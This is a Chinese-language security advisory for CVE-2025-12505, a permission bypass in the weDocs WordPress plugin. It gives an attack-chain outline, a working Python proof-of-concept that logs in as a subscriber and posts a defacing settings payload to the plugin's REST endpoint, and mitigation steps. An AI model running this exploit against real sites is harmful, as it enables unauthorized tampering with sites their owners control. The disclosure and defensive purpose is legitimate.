CVE-2025-12505 weDocs WordPress插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-12505

漏洞类型

权限绕过/访问控制

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

weDocs WordPress Plugin

漏洞概述

weDocs是WordPress平台上一款流行的文档管理插件，允许用户创建和管理在线文档知识库。该插件在2.1.14及之前的所有版本中存在严重的权限绕过漏洞。漏洞根源在于插件的create_item_permissions_check函数未能正确验证用户权限，导致任何已认证用户（即使是最低权限的订阅者角色）都可以访问管理员级别的API端点并修改全局插件设置。攻击者可利用此漏洞更改站点配置、劫持文档内容或进行进一步的攻击。由于WordPress的订阅者角色通常不需要特别授权即可创建，任何在目标站点拥有账户的攻击者都可以利用此漏洞，对使用该插件的数百万个WordPress站点构成严重威胁。

技术细节

漏洞存在于weDocs插件的REST API权限验证逻辑中。插件注册了REST API端点用于管理文档和设置，但在create_item_permissions_check回调函数中缺少必要的权限检查。具体问题在于：1) 函数未调用current_user_can()或current_user_can_for_blog()进行权限验证；2) 未检查用户角色是否为管理员或编辑者；3) 仅依赖WordPress的基本认证机制而非明确的权限检查。攻击者只需使用有效的订阅者账户凭证，通过发送POST请求到/wp-json/we-docs/v1/settings端点，即可修改插件配置。漏洞代码位于includes/API/SettingsApi.php文件的第115行和第179行附近。该漏洞属于OWASP Top 10中的Broken Access Control类别，CVSS 3.1向量为AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N。

攻击链分析

STEP 1

信息收集

攻击者识别目标站点使用weDocs插件并确定版本<=2.1.14

STEP 2

账户创建

攻击者在目标WordPress站点注册普通订阅者账户或利用已有账户

STEP 3

认证获取

通过wp-login.php使用账户凭证登录获取有效的session cookie

STEP 4

权限绕过

利用create_item_permissions_check函数缺少权限验证的缺陷

STEP 5

设置修改

发送POST请求到/wp-json/we-docs/v1/settings端点修改插件配置

STEP 6

持久化控制

修改站点配置或注入恶意代码实现持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12505 PoC - weDocs Plugin Unauthorized Settings Modification
# Target: WordPress site with weDocs plugin <= 2.1.14

def exploit_wedocs(target_url, username, password):
    """
    Exploit weDocs plugin permission bypass vulnerability
    Allows authenticated users with subscriber role to modify global settings
    """
    session = requests.Session()
    
    # Step 1: Authenticate with subscriber account
    login_url = f"{target_url}/wp-login.php"
    auth_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    
    resp = session.post(login_url, data=auth_data, allow_redirects=True)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")
    
    # Step 2: Modify plugin settings via REST API
    api_url = f"{target_url}/wp-json/we-docs/v1/settings"
    
    # Malicious settings payload
    settings_payload = {
        'general': {
            'site_name': 'Compromised by CVE-2025-12505',
            'custom_css': 'body { display: none; }'
        }
    }
    
    headers = {
        'Content-Type': 'application/json',
        'X-WP-Nonce': session.cookies.get('wordpress_rest_api_cookie', '')
    }
    
    # Attempt to modify settings (this should require admin privileges)
    resp = session.post(api_url, json=settings_payload, headers=headers)
    
    if resp.status_code in [200, 201]:
        print("[+] Settings modified successfully - VULNERABLE!")
        print(f"[+] Response: {resp.text}")
        return True
    else:
        print(f"[-] Request failed with status: {resp.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    exploit_wedocs(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

weDocs Plugin <= 2.1.14

防御指南

临时缓解措施

如果无法立即升级，可通过以下方式临时缓解：1) 在wp-config.php中添加代码禁用weDocs的REST API端点；2) 使用WordPress插件如WP Cerber限制API访问；3) 临时禁用weDocs插件直到完成升级；4) 加强用户注册审核流程，限制订阅者账户的创建；5) 部署ModSecurity等WAF规则阻止针对/wp-json/we-docs/路径的异常请求。建议尽快升级到官方发布的安全版本。